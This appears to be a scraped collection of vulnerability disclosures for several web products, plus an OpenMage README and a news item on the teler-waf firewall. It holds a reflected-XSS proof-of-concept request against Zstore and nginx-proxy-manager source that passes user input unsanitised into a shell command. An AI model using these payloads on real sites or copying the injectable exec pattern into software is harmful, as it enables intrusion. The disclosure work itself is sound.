In Last Yard 22.09.8-1, the cookie can be stolen via via unencrypted traffic.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**CVE-2022-47715**

Cookie missing secure flag In Last Yard 22.09.8-1, the cookie can be stolen via via unencrypted traffic.

Sample HTTP Response:

> \[Additional Information\] HTTP/2 200 OK Date: x, x x 2022 04:29:43 GMT Content-Type: text/html; charset=utf-8 Server: nginx X-Frame-Options: DENY Vary: Cookie
> 
> Set-Cookie: LastYardVersion=22.09.8-1; expires=Sat, x x 2023 04:29:43 GMT; Max-Age=31536000; Path=/. <----------------
> 
> Set-Cookie: csrftoken=TmSZIwAxuul6kpXWDYlZ96FnNs6HTT1nNFsfkMrUMYq3mekiXv1FjqSUI2TugG74; expires=Fri, x x 2023 04:29:43 GMT; Max-Age=31449600; Path=/; SameSite=Lax; Secure X-Request-Id: x

CVE-2022-47715: GitHub - l00neyhacker/CVE-2022-47715

Zstore version 6.6.0 suffers from a cross site scripting vulnerability.

    ## Title: zstore-6.6.0 - XSS-Reflected## Development: nu11secur1ty## Date: 01.29.2023## Vendor: https://zippy.com.ua/## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4## Description:The value of manual insertion `point 1` is copied into the HTMLdocument as plain text between tags.The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted inthe manual insertion point 1.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Exploit:```GETGET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0aHTTP/2Host: store.zippy.com.uaCookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://store.zippy.com.ua/index.php?q=p:App/Pages/MainAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9```[+] Response:```HTTP/2 200 OKServer: nginxDate: Sun, 29 Jan 2023 07:27:55 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546Class \App\Pages\Chatgiflc<ahref="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><imgsrc=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>```## Proof and Exploit:[href](https://streamable.com/aadj5c)## Reference:[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

Zstore 6.6.0 Cross Site Scripting

Magneto LTS (Long Term Support) is a community developed alternative to the Magento CE official releases. Versions prior to 19.4.22 and 20.0.19 are vulnerable to Cross-Site Request Forgery. The password reset form is vulnerable to CSRF between the time the reset password link is clicked and user submits new password. This issue is patched in versions 19.4.22 and 20.0.19. There are no workarounds.

**README**

    

**Magento - Long Term Support**

This repository is the home of an **unofficial** community-driven project. It's goal is to be a dependable alternative to the Magento CE official releases which integrates improvements directly from the community while maintaining a high level of backwards compatibility to the official releases.

**Pull requests with bug fixes and security patches from the community are encouraged and welcome!**

**Table of contents**

*   Requirements
    *   Optional
*   Installation
    *   Manual Install
    *   Composer
    *   Git
*   Secure your installation
    *   Apache .htaccess
    *   Nginx
*   Changes
    *   Between Magento 1.9.4.5 and OpenMage 19.x
    *   Between OpenMage 19.4.18 / 20.0.16 and 19.4.19 / 20.0.17
    *   Since OpenMage 19.5.0 / 20.1.0
    *   New Config Options
    *   New Events
    *   Changes to SOAP/WSDL
*   Development Environment with ddev
*   Development with PHP 8.1
*   PhpStorm Factory Helper
*   Versioning
*   Public Communication
*   Maintainers
*   License
*   Contributors

**Requirements**

*   PHP 7.3+ (PHP 8.0 is supported, PHP 8.1 is work in progress)
    
*   MySQL 5.6+ (8.0+ recommended) or MariaDB
    
*   PHP extension intl since 1.9.4.19 & 20.0.17
    
*   Command patch 2.7+ (or gpatch on MacOS/HomeBrew) since 1.9.5.0 & 20.1.0
    

**Please be aware that although OpenMage is compatible that one or more extensions may not be.**

**Optional**

*   Redis 5+ (6.x recommended, latest verified compatible 6.0.7 with 20.x)

**Installation****Manual Install**

Download the latest release archive and extract it over your existing install. **Important:** you must download the ZIP file from a tagged version on the releases page, otherwise there will be missing dependencies.

**Composer**

Step 1: Create a new composer project:

composer init

Step 2: Configure composer. **The below options are required.** You can see all options here.

# Allow composer to apply patches to dependencies of magento-lts
composer config --json extra.enable-patching true

# Configure Magento core composer installer to use magento-lts as the Magento source package
composer config extra.magento-core-package-type magento-source

# Configure the root directory that magento-lts will be installed to, such as "pub", "htdocs", or "www"
composer config extra.magento-root-dir pub

Step 3: Require magento-core-composer-installer:

# PHP 7
composer require "aydin-hassan/magento-core-composer-installer":"~2.0.0"

# PHP 8
composer require "aydin-hassan/magento-core-composer-installer":"^2.1.0"

Note: be sure to select y if composer asks you to trust aydin-hassan/magento-core-composer-installer.

Step 4: Require magento-lts:

# OpenMage v19
composer require "openmage/magento-lts":"^19.4.0"

# OpenMage v20
composer require "openmage/magento-lts":"^20.0.0"

Note: be sure to select y if composer asks you to trust magento-hackathon/magento-composer-installer or cweagans/composer-patches.

To install the latest development version (may be unstable):

# OpenMage v19
composer require "openmage/magento-lts":"1.9.4.x-dev"

# OpenMage v20
composer require "openmage/magento-lts":"20.0.x-dev"

**Git**

If you want to contribute to the project:

git init
git remote add origin https://github.com/<YOUR GIT USERNAME\>/magento-lts
git pull origin main
git remote add upstream https://github.com/OpenMage/magento-lts
git pull upstream 1.9.4.x
git add -A && git commit

More Information

**Secure your installation**

Don't use common paths like /admin for OpenMage Backend URL. Don't use the path in _robots.txt_ and keep it secret. You can change it from Backend (System / Configuration / Admin / Admin Base Url) or by editing _app/etc/local.xml_:

<config\>
    <admin\>
        <routers\>
            <adminhtml\>
                <args\>
                    <frontName\><!\[CDATA\[admin\]\]></frontName\>
                </args\>
            </adminhtml\>
        </routers\>
    </admin\>
</config\>

Don't use common file names like api.php for OpenMage API URLs to prevent attacks. Don't use the new file name in _robots.txt_ and keep it secret with your partners. After renaming the file you must update the webserver configuration as follows:

**Apache .htaccess**

    RewriteRule ^api/rest api.php?type=rest [QSA,L]
    

**Nginx**

    rewrite ^/api/(\w+).*$ /api.php?type=$1 last;`
    

**Changes**

Most important changes will be listed here, all other changes since 19.4.0 can be found in release notes.

**Between Magento 1.9.4.5 and OpenMage 19.x**

*   bug fixes and PHP 7.x, 8.0 and 8.1 compatibility
*   added config cache for system.xml (#1916)
*   search for "NULL" in backend grids (#1203)
*   removed lib/flex containing unused ActionScript "file uploader" files (#2271)
*   Mage\_Catalog\_Model\_Resource\_Abstract::getAttributeRawValue() now returns '0' instead of false if the value stored in the database is 0 (#572)
*   removed modules:
    *   Mage_Backup (#2811)
    *   Mage_Compiler
    *   Mage_GoogleBase
    *   Mage_PageCache (#2258)
    *   Mage_Xmlconnect
    *   Phoenix_Moneybookers

_If you rely on those modules you can reinstall them with composer:_

*   Mage_Backup: composer require openmage/module-mage-backup
*   Mage_PageCache: composer require openmage/module-mage-pagecache

**Between OpenMage 19.4.18 / 20.0.16 and 19.4.19 / 20.0.17**

*   PHP extension intl is required

**Between OpenMage 19.x and 20.x**

Do not use 20.x.x if you need IE support.

*   removed IE conditional comments, IE styles, IE scripts and IE eot files (#1073)
*   removed frontend default themes (default, modern, iphone, german, french, blank, blue) (#1600)
*   fixed incorrect datetime in customer block ($useTimezone parameter) (#1525)
*   added redis as a valid option for global/session_save (#1513)
*   reduce needless saves by avoiding setting _hasDataChanges flag (#2066)
*   removed support for global/sales/old_fields_map defined in XML (#921)
*   enabled website level config cache (#2355)
*   make overrides of Mage\_Core\_Model\_Resource\_Db\_Abstract::delete respect parent api (#1257)

For full list of changes, you can compare tags.

**Since OpenMage 19.5.0 / 20.1.0**

Most of the 3rd party libraries/modules that were bundled in our repository were removed and migrated to composer dependencies. This allows for better maintenance and upgradability.

Specifically:

*   phpseclib, mcrypt_compat, Cm_RedisSession, Cm_Cache_Backend_Redis, Pelago_Emogrifier (#2411)
*   Zend Framework 1 (#2827)

If your project uses OpenMage through composer then all dependencies will be managed automatically.  
If you just extracted the release zip/tarball in your project's main folder then be sure to:

*   remove the old copy of aforementioned libraries from your project, you can do that with this command:
    
    rm -rf app/code/core/Zend lib/Cm lib/Credis lib/mcryptcompat lib/Pelago lib/phpseclib lib/Zend
    
*   download the new release zip file that is named openmage-VERSIONNUMBER.zip, this one is built to contain the vendor folder generated by composer, with all the dependencies in it
    
*   extract the zip file in your project's repository as you always did
    

We also decided to remove our Zend\_DB patches (that were stored in app/code/core/Zend) because they were very old and not compatible with the new implementations made by ZF1-Future, which is much more advanced and feature rich. This may generate a problem with \`Zend\_Db\_Select' statements that do not use 'Zend\_Db\_Expr' to quote expressions. If you see SQL errors after upgrading please remember to check for this specific issue in your code.

**New Config Options**

*   admin/design/use_legacy_theme
*   admin/global_search/enable
*   admin/emails/admin_notification_email_template
*   catalog/product_image/progressive_threshold
*   catalog/search/search_separator
*   dev/log/max_level
*   newsletter/security/enable_form_key
*   sitemap/category/lastmod
*   sitemap/page/lastmod
*   sitemap/product/lastmod

**New Events**

*   adminhtml_block_widget_form_init_form_values_after
*   adminhtml_block_widget_tabs_html_before
*   adminhtml_sales_order_create_save_before
*   checkout_cart_product_add_before
*   sitemap_cms_pages_generating_before
*   sitemap_urlset_generating_before

Full list of events

**Changes to SOAP/WSDL**

Since 19.4.17/20.0.15 we changed the targetNamespace of all the WSDL files (used in the API modules), from Magento to OpenMage. If your custom modules extends OpenMage's APIs with a custom WSDL file and there are some hardcoded targetNamespace="urn:Magento" strings, your APIs may stop working.

Please replace all occurrences of

    targetNamespace="urn:Magento"
    

with

    targetNamespace="urn:OpenMage"
    

or alternatively

    targetNamespace="urn:{{var wsdl.name}}"
    

to avoid any problem.

To find which files need the modification you can run this command from the root directory of your project.

grep -rn 'urn:Magento' --include \\\*.xml

**Development Environment with DDEV**

*   Install ddev
*   Clone the repository as described in installation (Git)
*   Create a ddev config, defaults should be good for you
    
    ddev config
    
*   Open .ddev/config.yaml and change the php version to your needs
*   Download and start the containers
    
    ddev start
    
*   Open your site in browser
    
    ddev launch
    

**Development with PHP 8.1**

Deprecation errors are supressed by default.

If you want to work on PHP 8.1 support, set environment variable DEV_PHP_STRICT to 1, to show all errors.

**PhpStorm Factory Helper**

This repo includes class maps for the core Magento files in .phpstorm.meta.php. To add class maps for installed extensions, you have to install N98-magerun and run command:

n98-magerun.phar dev:ide:phpstorm:meta

You can add additional meta files in this directory to cover your own project files. See PhpStorm advanced metadata for more information.

**Versioning**

Though Magento does **not** follow Semantic Versioning we aim to provide a workable system for dependency definition.

**Public Communication**

*   Discord (maintained by Flyingmana)

**Maintainers**

*   Daniel Fahlke
*   David Robinson
*   Fabrizio Balliano
*   Lee Saferite
*   Mohamed Elidrissi
*   Ng Kiat Siong
*   Sven Reichel
*   Tymoteusz Motylewski

**License**

*   OSL v3.0
*   AFL v3.0

**Contributors ✨**

Thanks goes to these wonderful people (emoji key):

  
**sv3n**

  
**Lee Saferite**

  
**Colin Mollenhour**

  
**David Robinson**

  
**Tymoteusz Motylewski**

  
**Daniel Fahlke**

  
**SNH\_NL**

  
**Marc Romano**

  
**Fabian Blechschmidt**

  
**Luboš Hubáček**

  
**Erik Dannenberg**

  
**Jeroen Boersma**

  
**Leandro F. L.**

  
**Kevin Krieger**

  
**Ng Kiat Siong**

  
**bob2021**

  
**Bastien Lamamy**

  
**Dmitry Furs**

  
**Robert Coleman**

  
**Milan Davídek**

  
**Matt Davenport**

  
**elfling**

  
**henrykb**

  
**Tony**

  
**Mark Lewis**

  
**Eric Sean Turner**

  
**Eric Seastrand**

  
**Tobias Schifftner**

  
**Simon Sprankel**

  
**Tom Lankhorst**

  
**shirtsofholland**

  
**sebastianwagner**

  
**Maxime Huran**

  
**Pepijn**

  
**manuperezgo**

  
**luigifab**

  
**Loek van Gool**

  
**kpitn**

  
**kalenjordan**

  
**IOWEB TECHNOLOGIES**

  
**Florent**

  
**dvdsndr**

  
**Vincent MARMIESSE**

  
**Lucas van Staden**

  
**zamoroka**

  
**wpdevteam**

  
**Wouter Samaey**

  
**Vova Yatsyuk**

  
**Trevor Hartman**

  
**Somewhere**

  
**Fabian Schmengler />**

  
**Roman Hutterer**

  
**Sergei Filippov**

  
**Sam Steele**

  
**Ricardo Velhote**

  
**Roy Duineveld**

  
**Roberto Sarmiento Pérez**

  
**Pierre Martin**

  
**Rafał Dołgopoł**

  
**Rafael Patro**

  
**Andreas Pointner**

  
**Paul Rodriguez**

  
**ollb**

  
**Nicholas Graham**

  
**Makis Palasis**

  
**Miguel Balparda**

  
**Mark van der Sanden**

  
**Micky Socaci**

  
**Marvin Sengera**

  
**Kostadin A.**

  
**Julien Loizelet**

  
**Jonas Hünig**

  
**Stefan Jaroschek**

  
**Jacques Bodin-Hullin**

  
**Wilhelm Ellmann**

  
**Edwin.**

  
**drago-aca**

  
**Daniel Niedergesäß**

  
**J Davis**

  
**Damien Biasotto**

  
**Daniel Corn**

  
**Paweł Cieślik**

  
**André Herrn**

  
**Pablo Benmaman**

  
**aterjung**

  
**altdovydas**

  
**Alisson Júnior**

  
**Alex Kirsch**

  
**Branden**

  
**Pof Magicfingers**

  
**Michael Thessel**

  
**Jonathan Laliberte**

  
**Ivan Chepurnyi**

  
**Igor**

  
**Elias Kotlyar**

  
**Hejty1**

  
**Gaelle**

  
**Frédéric MARTINEZ**

  
**Tobias Faust**

  
**AndresInSpace**

  
**Francesco Boes**

  
**Daniel Bachmann**

  
**Damian Luszczymak**

  
**Fabrizio Balliano**

  
**Jouriy**

  
**Digital Pianism**

  
**Justin Beaty**

  
**ADDISON**

  
**Aria Stewart**

  
**Dean Williams**

  
**Henry Hirsch**

  
**kdckrs**

  
**Martin René Sørensen**

  
**Frank Rochlitzer**

  
**AlterWeb**

  
**Caprico**

  
**David Windell**

  
**Dragan Atanasov**

  
**Eugene Lamskoy**

  
**Ferdinand**

  
**Himanshu**

  
**Jakub Idziak**

  
**Joseph Maxwell**

  
**Joshua Dickerson**

  
**Kevin Bortnick**

  
**Mehdi Chaouch**

  
**Mohamed ELIDRISSI**

  
**Justin van Elst**

  
**Nicholas Graham**

  
**Patrick Schnell**

  
**Patrick Cronin**

  
**Petr Švamberg**

  
**Rafael Corrêa Gomes**

  
**Ralf Siepker**

  
**Sunel Tr**

  
**Tom Klingenberg**

  
**Toon**

  
**WEXO team**

  
**Wilfried Wolf**

  
**akrzemianowski**

  
**andthink**

  
**eetzen**

  
**lemundo-team**

  
**mdlonline**

  
**Benjamin MARROT**

  
**Tino Mewes**

  
**Carsten Brandt**

  
**Enéias Ramos de Melo**

  
**Scott Moore**

  
**Roger Feese**

  
**Alexander Gelzer**

This project follows the all-contributors specification. Contributions of any kind welcome!

CVE-2021-21395: openmage/magento-lts - Packagist

jc21 NGINX Proxy Manager through 2.9.19 allows OS command injection. When creating an access list, the backend builds an htpasswd file with crafted username and/or password input that is concatenated without any validation, and is directly passed to the exec command, potentially allowing an authenticated attacker to execute arbitrary commands on the system. NOTE: this is not part of any NGINX software shipped by F5.

const \_ \= require('lodash'); const fs \= require('fs'); const batchflow \= require('batchflow'); const logger \= require('../logger').access; const error \= require('../lib/error'); const accessListModel \= require('../models/access\_list'); const accessListAuthModel \= require('../models/access\_list\_auth'); const accessListClientModel \= require('../models/access\_list\_client'); const proxyHostModel \= require('../models/proxy\_host'); const internalAuditLog \= require('./audit-log'); const internalNginx \= require('./nginx'); const utils \= require('../lib/utils'); function omissions () { return \['is\_deleted'\]; } const internalAccessList \= { /\*\* \* @param {Access} access \* @param {Object} data \* @returns {Promise} \*/ create: (access, data) \=> { return access.can('access\_lists:create', data) .then((/\*access\_data\*/) \=> { return accessListModel .query() .omit(omissions()) .insertAndFetch({ name: data.name, satisfy\_any: data.satisfy\_any, pass\_auth: data.pass\_auth, owner\_user\_id: access.token.getUserId(1) }); }) .then((row) \=> { data.id \= row.id; let promises \= \[\]; // Now add the items data.items.map((item) \=> { promises.push(accessListAuthModel .query() .insert({ access\_list\_id: row.id, username: item.username, password: item.password }) ); }); // Now add the clients if (typeof data.clients !== 'undefined' && data.clients) { data.clients.map((client) \=> { promises.push(accessListClientModel .query() .insert({ access\_list\_id: row.id, address: client.address, directive: client.directive }) ); }); } return Promise.all(promises); }) .then(() \=> { // re-fetch with expansions return internalAccessList.get(access, { id: data.id, expand: \['owner', 'items', 'clients', 'proxy\_hosts.access\_list.\[clients,items\]'\] }, true /\* <- skip masking \*/); }) .then((row) \=> { // Audit log data.meta \= \_.assign({}, data.meta || {}, row.meta); return internalAccessList.build(row) .then(() \=> { if (row.proxy\_host\_count) { return internalNginx.bulkGenerateConfigs('proxy\_host', row.proxy\_hosts); } }) .then(() \=> { // Add to audit log return internalAuditLog.add(access, { action: 'created', object\_type: 'access-list', object\_id: row.id, meta: internalAccessList.maskItems(data) }); }) .then(() \=> { return internalAccessList.maskItems(row); }); }); }, /\*\* \* @param {Access} access \* @param {Object} data \* @param {Integer} data.id \* @param {String} \[data.name\] \* @param {String} \[data.items\] \* @return {Promise} \*/ update: (access, data) \=> { return access.can('access\_lists:update', data.id) .then((/\*access\_data\*/) \=> { return internalAccessList.get(access, {id: data.id}); }) .then((row) \=> { if (row.id !== data.id) { // Sanity check that something crazy hasn't happened throw new error.InternalValidationError('Access List could not be updated, IDs do not match: ' + row.id + ' !== ' + data.id); } }) .then(() \=> { // patch name if specified if (typeof data.name !== 'undefined' && data.name) { return accessListModel .query() .where({id: data.id}) .patch({ name: data.name, satisfy\_any: data.satisfy\_any, pass\_auth: data.pass\_auth, }); } }) .then(() \=> { // Check for items and add/update/remove them if (typeof data.items !== 'undefined' && data.items) { let promises \= \[\]; let items\_to\_keep \= \[\]; data.items.map(function (item) { if (item.password) { promises.push(accessListAuthModel .query() .insert({ access\_list\_id: data.id, username: item.username, password: item.password }) ); } else { // This was supplied with an empty password, which means keep it but don't change the password items\_to\_keep.push(item.username); } }); let query \= accessListAuthModel .query() .delete() .where('access\_list\_id', data.id); if (items\_to\_keep.length) { query.andWhere('username', 'NOT IN', items\_to\_keep); } return query .then(() \=> { // Add new items if (promises.length) { return Promise.all(promises); } }); } }) .then(() \=> { // Check for clients and add/update/remove them if (typeof data.clients !== 'undefined' && data.clients) { let promises \= \[\]; data.clients.map(function (client) { if (client.address) { promises.push(accessListClientModel .query() .insert({ access\_list\_id: data.id, address: client.address, directive: client.directive }) ); } }); let query \= accessListClientModel .query() .delete() .where('access\_list\_id', data.id); return query .then(() \=> { // Add new items if (promises.length) { return Promise.all(promises); } }); } }) .then(internalNginx.reload) .then(() \=> { // Add to audit log return internalAuditLog.add(access, { action: 'updated', object\_type: 'access-list', object\_id: data.id, meta: internalAccessList.maskItems(data) }); }) .then(() \=> { // re-fetch with expansions return internalAccessList.get(access, { id: data.id, expand: \['owner', 'items', 'clients', 'proxy\_hosts.access\_list.\[clients,items\]'\] }, true /\* <- skip masking \*/); }) .then((row) \=> { return internalAccessList.build(row) .then(() \=> { if (row.proxy\_host\_count) { return internalNginx.bulkGenerateConfigs('proxy\_host', row.proxy\_hosts); } }) .then(() \=> { return internalAccessList.maskItems(row); }); }); }, /\*\* \* @param {Access} access \* @param {Object} data \* @param {Integer} data.id \* @param {Array} \[data.expand\] \* @param {Array} \[data.omit\] \* @param {Boolean} \[skip\_masking\] \* @return {Promise} \*/ get: (access, data, skip\_masking) \=> { if (typeof data \=== 'undefined') { data \= {}; } return access.can('access\_lists:get', data.id) .then((access\_data) \=> { let query \= accessListModel .query() .select('access\_list.\*', accessListModel.raw('COUNT(proxy\_host.id) as proxy\_host\_count')) .joinRaw('LEFT JOIN \`proxy\_host\` ON \`proxy\_host\`.\`access\_list\_id\` = \`access\_list\`.\`id\` AND \`proxy\_host\`.\`is\_deleted\` = 0') .where('access\_list.is\_deleted', 0) .andWhere('access\_list.id', data.id) .allowEager('\[owner,items,clients,proxy\_hosts.\[\*, access\_list.\[clients,items\]\]\]') .omit(\['access\_list.is\_deleted'\]) .first(); if (access\_data.permission\_visibility !== 'all') { query.andWhere('access\_list.owner\_user\_id', access.token.getUserId(1)); } // Custom omissions if (typeof data.omit !== 'undefined' && data.omit !== null) { query.omit(data.omit); } if (typeof data.expand !== 'undefined' && data.expand !== null) { query.eager('\[' + data.expand.join(', ') + '\]'); } return query; }) .then((row) \=> { if (row) { if (!skip\_masking && typeof row.items !== 'undefined' && row.items) { row \= internalAccessList.maskItems(row); } return \_.omit(row, omissions()); } else { throw new error.ItemNotFoundError(data.id); } }); }, /\*\* \* @param {Access} access \* @param {Object} data \* @param {Integer} data.id \* @param {String} \[data.reason\] \* @returns {Promise} \*/ delete: (access, data) \=> { return access.can('access\_lists:delete', data.id) .then(() \=> { return internalAccessList.get(access, {id: data.id, expand: \['proxy\_hosts', 'items', 'clients'\]}); }) .then((row) \=> { if (!row) { throw new error.ItemNotFoundError(data.id); } // 1. update row to be deleted // 2. update any proxy hosts that were using it (ignoring permissions) // 3. reconfigure those hosts // 4. audit log // 1. update row to be deleted return accessListModel .query() .where('id', row.id) .patch({ is\_deleted: 1 }) .then(() \=> { // 2. update any proxy hosts that were using it (ignoring permissions) if (row.proxy\_hosts) { return proxyHostModel .query() .where('access\_list\_id', '=', row.id) .patch({access\_list\_id: 0}) .then(() \=> { // 3. reconfigure those hosts, then reload nginx // set the access\_list\_id to zero for these items row.proxy\_hosts.map(function (val, idx) { row.proxy\_hosts\[idx\].access\_list\_id \= 0; }); return internalNginx.bulkGenerateConfigs('proxy\_host', row.proxy\_hosts); }) .then(() \=> { return internalNginx.reload(); }); } }) .then(() \=> { // delete the htpasswd file let htpasswd\_file \= internalAccessList.getFilename(row); try { fs.unlinkSync(htpasswd\_file); } catch (err) { // do nothing } }) .then(() \=> { // 4. audit log return internalAuditLog.add(access, { action: 'deleted', object\_type: 'access-list', object\_id: row.id, meta: \_.omit(internalAccessList.maskItems(row), \['is\_deleted', 'proxy\_hosts'\]) }); }); }) .then(() \=> { return true; }); }, /\*\* \* All Lists \* \* @param {Access} access \* @param {Array} \[expand\] \* @param {String} \[search\_query\] \* @returns {Promise} \*/ getAll: (access, expand, search\_query) \=> { return access.can('access\_lists:list') .then((access\_data) \=> { let query \= accessListModel .query() .select('access\_list.\*', accessListModel.raw('COUNT(proxy\_host.id) as proxy\_host\_count')) .joinRaw('LEFT JOIN \`proxy\_host\` ON \`proxy\_host\`.\`access\_list\_id\` = \`access\_list\`.\`id\` AND \`proxy\_host\`.\`is\_deleted\` = 0') .where('access\_list.is\_deleted', 0) .groupBy('access\_list.id') .omit(\['access\_list.is\_deleted'\]) .allowEager('\[owner,items,clients\]') .orderBy('access\_list.name', 'ASC'); if (access\_data.permission\_visibility !== 'all') { query.andWhere('access\_list.owner\_user\_id', access.token.getUserId(1)); } // Query is used for searching if (typeof search\_query \=== 'string') { query.where(function () { this.where('name', 'like', '%' + search\_query + '%'); }); } if (typeof expand !== 'undefined' && expand !== null) { query.eager('\[' + expand.join(', ') + '\]'); } return query; }) .then((rows) \=> { if (rows) { rows.map(function (row, idx) { if (typeof row.items !== 'undefined' && row.items) { rows\[idx\] \= internalAccessList.maskItems(row); } }); } return rows; }); }, /\*\* \* Report use \* \* @param {Integer} user\_id \* @param {String} visibility \* @returns {Promise} \*/ getCount: (user\_id, visibility) \=> { let query \= accessListModel .query() .count('id as count') .where('is\_deleted', 0); if (visibility !== 'all') { query.andWhere('owner\_user\_id', user\_id); } return query.first() .then((row) \=> { return parseInt(row.count, 10); }); }, /\*\* \* @param {Object} list \* @returns {Object} \*/ maskItems: (list) \=> { if (list && typeof list.items !== 'undefined') { list.items.map(function (val, idx) { let repeat\_for \= 8; let first\_char \= '\*'; if (typeof val.password !== 'undefined' && val.password) { repeat\_for \= val.password.length \- 1; first\_char \= val.password.charAt(0); } list.items\[idx\].hint \= first\_char + ('\*').repeat(repeat\_for); list.items\[idx\].password \= ''; }); } return list; }, /\*\* \* @param {Object} list \* @param {Integer} list.id \* @returns {String} \*/ getFilename: (list) \=> { return '/data/access/' + list.id; }, /\*\* \* @param {Object} list \* @param {Integer} list.id \* @param {String} list.name \* @param {Array} list.items \* @returns {Promise} \*/ build: (list) \=> { logger.info('Building Access file #' + list.id + ' for: ' + list.name); return new Promise((resolve, reject) \=> { let htpasswd\_file \= internalAccessList.getFilename(list); // 1. remove any existing access file try { fs.unlinkSync(htpasswd\_file); } catch (err) { // do nothing } // 2. create empty access file try { fs.writeFileSync(htpasswd\_file, '', {encoding: 'utf8'}); resolve(htpasswd\_file); } catch (err) { reject(err); } }) .then((htpasswd\_file) \=> { // 3. generate password for each user if (list.items.length) { return new Promise((resolve, reject) \=> { batchflow(list.items).sequential() .each((i, item, next) \=> { if (typeof item.password !== 'undefined' && item.password.length) { logger.info('Adding: ' + item.username); utils.exec('/usr/bin/htpasswd -b "' + htpasswd\_file + '" "' + item.username + '" "' + item.password + '"') .then((/\*result\*/) \=> { next(); }) .catch((err) \=> { logger.error(err); next(err); }); } }) .error((err) \=> { logger.error(err); reject(err); }) .end((results) \=> { logger.success('Built Access file #' + list.id + ' for: ' + list.name); resolve(results); }); }); } }); } }; module.exports \= internalAccessList;

CVE-2023-23596: nginx-proxy-manager/access-list.js at 4f10d129c20cc82494b95cc94b97f859dbd4b54d · NginxProxyManager/nginx-proxy-manager

Spitfire CMS 1.0.475 is vulnerable to PHP Object Injection.

Title: Spitfire CMS 1.0.475 (cms\_backup\_values) PHP Object Injection  
Advisory ID: ZSL-2022-5720  
Type: Local/Remote  
Impact: Manipulation of Data, DoS  
Risk: (4/5)  
Release Date: 09.12.2022

**Summary**

Spitfire is a system to manage the content of webpages.

**Description**

The application is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.

**Vendor**

Claus Muus - http://spitfire.clausmuus.de

**Affected Version**

1.0.475

**Tested On**

nginx

**Vendor Status**

\[28.09.2022\] Vulnerability discovered.  
\[28.09.2022\] Vendor contacted.  
\[08.12.2022\] No response from the vendor.  
\[09.12.2022\] Public security advisory released.

**PoC**

spitfirecms\_cookieobjinj.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://packetstormsecurity.com/files/170186/  
\[2\] https://cxsecurity.com/issue/WLB-2022120026

**Changelog**

\[09.12.2022\] - Initial release  
\[10.12.2022\] - Added reference \[1\]  
\[14.12.2022\] - Added reference \[2\]

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

CVE-2022-47083: Zero Science Lab » Spitfire CMS 1.0.475 (cms_backup_values) PHP Object Injection

Protection against XSS, SQLi, and more web attacks for Go-based web applications

Protection against XSS, SQLi, and more web attacks for Go-based web applications

A developer has released a new tool for Go applications that is designed to combat web-based attacks.

Developer and security engineer Dwi Siswanto revealed the open source teler-waf software on January 2. The 24-year-old said on Twitter that the technology was designed to “improve the security of Go-based web applications”.

Available on GitHub, teler-waf acts as HTTP middleware, with an interface for integrating intrusion detection system (IDS) functionality into existing applications.

Teler-waf’s security functions include protection against common web-based threats, such as cross-site scripting (XSS) attacks and SQL injections.

Furthermore, the tool will detect bad IP addresses linked to known threat actors and botnets; malicious HTTP referers, crawlers, and scrapers suspected of causing performance issues or performing illicit data scraping; and locations associated with directory-based brute-force attacks.

**Under the bonnet**

Speaking to The Daily Swig, Siswanto, who developed teler-waf independently, said the software has several benefits.

A key feature, for example, is the use of datasets updated daily that track known vulnerabilities and malicious patterns of attack. External resources include information from the PHPIDS project, CVE lists from the Project Discovery team, and collections sourced from the Nginx Ultimate Bad Bot Blocker and Crawler Detect.

WIN SWAG Complete our reader survey to be in with a chance of winning Burp Suite merchandise

In addition, teler-waf comes with a net/http handler for integration with application routing functionality, which Siswanto said “makes it easy to integrate into any framework and \[is\] also highly configurable, allowing it to be tailored to the specific needs of a given web application.

